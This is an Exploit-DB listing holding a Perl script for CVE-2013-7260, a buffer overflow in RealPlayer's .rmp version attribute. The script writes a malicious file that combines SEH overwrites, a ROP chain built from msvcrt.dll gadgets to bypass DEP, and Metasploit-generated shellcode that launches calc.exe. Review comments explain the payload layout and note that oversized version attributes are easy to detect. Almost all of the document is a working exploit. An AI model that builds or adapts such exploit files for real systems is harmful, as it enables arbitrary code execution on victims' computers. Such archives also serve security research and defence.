RealNetworks RealPlayer 16.0.3.51/16.0.2.32 - '.rmp' Version Attribute Buffer Overflow

EDB-ID:

30468




Platform:

Windows

Date:

2013-12-24


#!/usr/bin/perl

#-----------------------------------------------------------------------------#
# Exploit Title: RealNetworks RealPlayer Version Attribute Buffer Overflow    #
# Date: Dec 20 2013                                                           #
# Exploit Author: Gabor Seljan                                                #
# Vendor Homepage: http://www.real.com                                        #
# Software Link: http://www.oldapps.com/real.php?old_real_player=12814        #
# Version: 16.0.3.51, 16.0.2.32                                               #
# Tested on: Windows XP SP2/SP3 (DEP Bypass)                                  #
# CVE: CVE-2013-7260                                                          #
#-----------------------------------------------------------------------------#

use strict;
use warnings;

# Output file. The name is a fixed literal, so the two-arg open below has no
# caller-controlled input; see the NOTE(review) at the open call anyway.
my $filename = "sploit.rmp";

# Payload layout: the concatenation in $sploit below becomes the value of the
# XML declaration's version attribute (see the print near the end). The
# comments on $junk2/$junk3 record that two different open paths reach the
# handler at different offsets, which is why there are two nSEH/SEH pairs.
my $junk1 = "\x41" x 44;          # Offset to ROP + Shellcode
my $junk2 = "\x43" x 1858;        # Offset to SEH when opening via click (2540)
my $junk3 = "\x44" x 11052;       # Offset to SEH when opening via menu (13600)
my $nSEH  = "\xeb\x06\x90\x90";   # Overwrite next SEH with JMP (6 bytes)
my $SEH   = pack('V',0x5acceecd); # ADD ESP,428 # RETN 10 [mswmdm.dll]
my $junk4 = "\x45" x 17000;       # Generate exception

# All gadget addresses are absolute little-endian DWORDs (pack 'V'); they are
# tied to the module load bases of the "Tested on" configuration in the
# header, so the chain is presumably not portable to hosts where those
# modules load elsewhere -- address randomisation is the mitigation here.
my $rop_gadgets  = "";
   $rop_gadgets .= pack('V',0x77c1c552);  # RETN (ROP NOP) [msvcrt.dll]
   $rop_gadgets .= "\x42" x 16;  		      # JUNK
   $rop_gadgets .= pack('V',0x77c21d16);  # POP EAX # RETN [msvcrt.dll]
   $rop_gadgets .= pack('V',0x77c11120);  # &VirtualProtect() [IAT msvcrt.dll]
   $rop_gadgets .= pack('V',0x77c1bb36);  # POP EBP # RETN [msvcrt.dll]
   $rop_gadgets .= pack('V',0x77c20497);  # skip 4 bytes [msvcrt.dll]
   $rop_gadgets .= pack('V',0x77c2362c);  # POP EBX # RETN [msvcrt.dll]
   $rop_gadgets .= pack('V',0x0000095c);  # 0x0000095C-> EBX
   $rop_gadgets .= pack('V',0x77c4cb29);  # POP EDX # RETN [msvcrt.dll]
   $rop_gadgets .= pack('V',0x00000040);  # 0x00000040-> EDX
   $rop_gadgets .= pack('V',0x77c1f519);  # POP ECX # RETN [msvcrt.dll]
   $rop_gadgets .= pack('V',0x77C5D305);  # &Writable location [msvcrt.dll]
   $rop_gadgets .= pack('V',0x77c23b47);  # POP EDI # RETN [msvcrt.dll]
   $rop_gadgets .= pack('V',0x77c47a42);  # RETN (ROP NOP) [msvcrt.dll]
   $rop_gadgets .= pack('V',0x77c2ed13);  # POP ESI # RETN [msvcrt.dll]
   $rop_gadgets .= pack('V',0x77c2aacc);  # JMP [EAX] [msvcrt.dll]
   $rop_gadgets .= pack('V',0x77c12df9);  # PUSHAD # RETN [msvcrt.dll]
   $rop_gadgets .= pack('V',0x77c35459);  # PUSH ESP # RETN [msvcrt.dll]

my $nops = "\x90" x 16;

# msfpayload windows/exec CMD=calc.exe
# Opaque generated bytes; the comment above is the only description of them.
my $shellcode = "\xb8\x2f\x9e\xa9\x6f\xdb\xdc\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1".
"\x33\x83\xea\xfc\x31\x42\x0e\x03\x6d\x90\x4b\x9a\x8d\x44\x02\x65\x6d\x95\x75".
"\xef\x88\xa4\xa7\x8b\xd9\x95\x77\xdf\x8f\x15\xf3\x8d\x3b\xad\x71\x1a\x4c\x06".
"\x3f\x7c\x63\x97\xf1\x40\x2f\x5b\x93\x3c\x2d\x88\x73\x7c\xfe\xdd\x72\xb9\xe2".
"\x2e\x26\x12\x69\x9c\xd7\x17\x2f\x1d\xd9\xf7\x24\x1d\xa1\x72\xfa\xea\x1b\x7c".
"\x2a\x42\x17\x36\xd2\xe8\x7f\xe7\xe3\x3d\x9c\xdb\xaa\x4a\x57\xaf\x2d\x9b\xa9".
"\x50\x1c\xe3\x66\x6f\x91\xee\x77\xb7\x15\x11\x02\xc3\x66\xac\x15\x10\x15\x6a".
"\x93\x85\xbd\xf9\x03\x6e\x3c\x2d\xd5\xe5\x32\x9a\x91\xa2\x56\x1d\x75\xd9\x62".
"\x96\x78\x0e\xe3\xec\x5e\x8a\xa8\xb7\xff\x8b\x14\x19\xff\xcc\xf0\xc6\xa5\x87".
"\x12\x12\xdf\xc5\x78\xe5\x6d\x70\xc5\xe5\x6d\x7b\x65\x8e\x5c\xf0\xea\xc9\x60".
"\xd3\x4f\x25\x2b\x7e\xf9\xae\xf2\xea\xb8\xb2\x04\xc1\xfe\xca\x86\xe0\x7e\x29".
"\x96\x80\x7b\x75\x10\x78\xf1\xe6\xf5\x7e\xa6\x07\xdc\x1c\x29\x94\xbc\xcc\xcc".
"\x1c\x26\x11\x7f\x72\x75\x0a\xf5\x98\x79\x2f\xb1\x76\x30\xe0\x3f\x49\x74\x0d".
"\x93\x42\x0c\xbf\x92\xb8\x4e\xba\x4a\xbe\x99\x71\x09\xf8\x14\xa9\x96\x91\x7e".
"\x7c\x77\x27\x25\x7b\x38\xd6\x9b\x33\xd5\xb5\x31\xe1\x66\xb7\xb4\x80\xd2\xfd".
"\x2d\xb6\x24\x43\x67\x90\xb2\xbb\x47\x40\x73\x3c\x3d\x97\x1c\x29\xd0\xf9\x70".
"\x4b\x78\x35\x9f\x4f\x2c\xb3\x7a\x05\x87\xf6\xd3\xeb\x48\xb0\x89\xf7\xe2\x41".
"\x1d\x8d\xb9\x15\x04\x2b\xfc\xa8\x3a\xd4\x37\x7d\x19\xf8\x7e\x08\xeb\x21\xe1".
"\x7b\x71\x75\x05\x3f\xbb\x66\x0c\x93\x3c\x8d\x98\x69\xf9\x7c\x27\x70\x48\x23".
"\xd4\x84\xf5\xbe\x72\x4e\xa8\x9b\x73\x25\x41\x81\xe0\x04\x40\x78\x79\x43\x37".
"\x7f\x2c\x96\xb9\xbf\x74\x77\x1d\x0d\x20\xfc\xb4\x91\xa9\xb8\x97\x4b\x18\xe3".
"\x49\x7d\x76\x3d\x47\xba\xb5\x14\x99\xb1\x24\x83\xe2\x10\xfd\x67\x7a\x4f\x35".
"\x9f\xb6\xb3\x7d\x75\x32\xe2\x4a\x86\xd5\xb2\xb7\xb0\x77\x11\xe0\x12\xd1\xeb".
"\x1c\x90\x7f\x42\x7c\x2d\x92\x72\x2f\x7a\x13\xc0\xd6\x76\x15\x99\x70\x14\x8d".
"\x4e\xbe\x96\xb7\x85\xff\xc1\xe1\x2d\xb0\x71\x1b\xd5\x1d\x02\xe3\x04\x7b\x05".
"\xb2\x73\x03\xf8\xb4\x7e\x1a\xfd\xb9\x37\x42\x4b\xb3\x39\xf9\x25\xb5\xa8\x3d".
"\xba\x92\x40\x4a\xb6\x24\x79\x27\x0c\xbb\x88\xfc\x3c\x35\x97\x4f\x9b\x47\x78".
"\x15\x41\x91\x66\xb1\x74\x0d\xbf\xb8\x90\x28\xd4\x2a\xf5\x3f\x43\x93\x98\x2c".
"\x1c\xa9\x2f\x48\x9f\x67\x49\x3b\xd6"; 

my $evil = $rop_gadgets.$nops.$shellcode;

# Final attribute value: padding, chain, padding, first SEH pair, padding,
# second SEH pair, then trailing filler so the copy runs past the frame.
my $sploit = $junk1.$evil.$junk2.$nSEH.$SEH.$junk3.$nSEH.$SEH.$junk4;

# NOTE(review): two-arg open with a bareword filehandle, and close() is not
# checked, so a short write would go unnoticed. The idiom is a three-arg open
# with a lexical handle: open(my $fh, '>', $filename) or die ...; and
# close($fh) or die ...  Harmless here only because $filename is a literal.
open(FILE, ">$filename") || die "[-]Error:\n$!\n";
# The whole payload is emitted as the XML declaration's version attribute.
# Defensive note: a well-formed declaration carries a version of a few bytes,
# so a multi-kilobyte version value in an .rmp prolog is an easy thing for a
# file scanner or parser pre-check to reject.
print FILE "<?xml version=\"$sploit\"?>";
close(FILE);

print "Exploit file created successfully [$filename]!\n";